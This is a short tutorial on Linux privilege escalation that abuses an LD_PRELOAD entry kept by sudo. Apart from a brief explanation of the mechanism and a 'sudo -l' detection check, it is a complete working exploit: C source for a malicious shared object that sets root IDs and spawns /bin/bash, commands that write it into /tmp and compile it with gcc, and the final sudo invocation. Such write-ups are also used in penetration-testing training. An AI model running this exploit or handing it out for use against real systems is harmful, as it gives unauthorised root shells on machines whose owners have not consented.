SUDO-LD_PRELOAD Linux Privilege Escalation

What is LD_PRELOAD?

LD_PRELOAD is an optional environmental variable holding one or more paths to shared libraries or shared objects, the loader will load it before any other shared library including the C runtime library libc.so this is also called as preloading a library.

To avoid this mechanism being used as an attack vector for suid/sgid executable binaries, the loader ignores LD_PRELOAD if ruid != euid. For such binaries, only libraries in standard paths that are also suid/sgid will be preloaded.

Detection

Fire up terminal and type:

user@debian:~$ sudo -l 
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD

If output something like this, congratulations target is vulnerable and you can exploit the LD_PRELOAD issue to get root privilege shell and to accomplish privilege escalation you also need some sudo permission binary which uses LD_PRELOAD envr.

some Sudo command which can be done, current user.

Program File :

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

---

Exploit LD_PRELOAD.

open terminal and go to any Writable Directory for dropping shell.

writable directory like 

• /tmp
• /var/tmp
• /dev/shm

in our case we using /tmp directory.

Drop an evil.c using any text editor, here we used cat for dropping shell.

user@debian:/tmp$ cat << EOF >> evil.c
> #include <stdio.h>
> #include <sys/types.h>
> #include <stdlib.h>
> void _init() {
> unsetenv("LD_PRELOAD");
> setgid(0);
> setuid(0);
> system("/bin/bash");
> }
> EOF

lest Compile and make object file.

gcc -fPIC -shared -o evil.so evil.c -nostartfiles

Time to final step 3:)

sudo LD_PRELOAD=evil.so <COMMAND>

here <COMMAND> mean which command have u allowed to do with sudo.

you can use any sudo command which allowed to current user.

You Got a Shell!!!!!